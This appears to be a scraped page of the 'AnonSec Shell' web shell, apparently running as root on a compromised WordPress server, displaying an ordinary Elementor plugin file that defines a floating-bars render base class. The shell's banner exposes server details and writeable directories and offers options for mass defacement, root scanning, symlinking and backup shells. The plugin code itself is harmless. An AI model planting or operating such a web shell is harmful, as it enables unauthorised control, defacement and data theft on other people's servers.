AnonSec Shell
Server IP : 104.21.14.48  /  Your IP : 3.138.32.245   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/wp-content/plugins/elementor/modules/floating-buttons/classes/render/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/wp-content/plugins/elementor/modules/floating-buttons/classes/render/floating-bars-render-base.php
<?php

namespace Elementor\Modules\FloatingButtons\Classes\Render;

use Elementor\Modules\FloatingButtons\Base\Widget_Floating_Bars_Base;

/**
 * Class Floating_Bars_Render_Base.
 *
 * This is the base class that will hold shared functionality that will be needed by all the various widget versions.
 *
 * @since 3.23.0
 */
abstract class Floating_Bars_Render_Base {

	protected Widget_Floating_Bars_Base $widget;

	protected array $settings;

	abstract public function render(): void;

	public function __construct( Widget_Floating_Bars_Base $widget ) {
		$this->widget = $widget;
		$this->settings = $widget->get_settings_for_display();
	}

	protected function add_layout_render_attribute( $layout_classnames ) {
		$this->widget->add_render_attribute( 'layout', [
			'class' => $layout_classnames,
			'id' => $this->settings['advanced_custom_css_id'],
			'data-document-id' => get_the_ID(),
			'role' => 'alertdialog',
		] );
	}

	public static function get_layout_classnames( Widget_Floating_Bars_Base $widget, array $settings ): string {
		$layout_classnames = 'e-floating-bars e-' . $widget->get_name();
		$vertical_position = $settings['advanced_vertical_position'];
		$is_sticky = $settings['advanced_toggle_sticky'];
		$has_close_button = $settings['floating_bar_close_switch'];

		$layout_classnames .= ' has-vertical-position-' . $vertical_position;

		if ( 'yes' === $has_close_button ) {
			$layout_classnames .= ' has-close-button';
		}

		if ( 'yes' === $is_sticky ) {
			$layout_classnames .= ' is-sticky';
		}

		return $layout_classnames;
	}

	protected function build_layout_render_attribute(): void {
		$layout_classnames = static::get_layout_classnames( $this->widget, $this->settings );

		$this->add_layout_render_attribute( $layout_classnames );
	}
}

Anon7 - 2022
AnonSec Team